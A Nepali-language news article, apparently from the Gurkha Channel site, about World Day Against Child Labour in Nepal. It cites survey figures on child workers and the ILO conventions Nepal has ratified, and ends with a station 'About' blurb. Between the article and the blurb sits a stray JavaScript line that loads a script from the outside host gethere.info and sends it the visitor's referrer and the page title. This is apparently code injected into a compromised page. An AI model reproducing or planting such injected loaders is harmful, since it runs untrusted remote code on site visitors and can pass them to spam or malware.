बालश्रम बिरोध दिवस

admin Avatar

बाल श्रम विरुद्धको विश्व दिवस नेपालमा पनि विभिन्न कार्यक्रम गरी मनाईंएको छ। बालश्रम विरुद्ध सामाजिक सचेतना र सरोकार बढाउने उद्धेश्यले हरेक वर्ष जुन १२ तारिखमा यो दिवस मनाउने गरिन्छ। राष्ट्रिय श्रमशक्ति सर्वेक्षण प्रतिवेदन २००८ अनुसार १६ लाख बालबालिका श्रमिकका रुपमा कार्यरत छन्। ति मध्ये ६ लाख २० हजार बालबालिका निकृष्ट प्रकारको श्रममा संलग्न छन् । जोखिमपूर्ण श्रममा रहेका बालबालिकामा पनि झण्डै ६० प्रतिशत बालिका तथा ४० प्रतिशत संख्या बालकको रहेको छ।

डेढ लाख भन्दा बढी बालबालिका घरेलु श्रमिकका रुपमा कार्यरत रहेको विभिन्न तथ्याङ्कले देखाएका छन्। नेपाल सरकारले बालश्रम रोक्न तथा समग्र बालअधिकारको संरक्षण तथा संवर्द्धनका लागि बालअधिकार सम्वन्धि महासन्धि १९८९, श्रमका लागि न्यूनतम उमेर निर्धारण सम्वन्धि आइएलओ महासन्धी १३८ र निकृष्ट प्रकारको बालश्रम उन्मुलन सम्वन्धि महासन्धि १८२ लाई अनुमोदन समेत गरेको छ। थुप्रै कानुनी, नीतिगत, र राष्टिय स्तरका कार्यक्रम भएपनि गरिबी, जनचेतनाको अभाव, स्पष्ट कानूनी व्यवस्था र कार्यान्वयनको अभाव जस्ता अवरोधका कारण बालश्रम निवारणले उचित लक्ष्य हासिल गर्न नसकेको सरोकारवालाले बताएका छन्।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories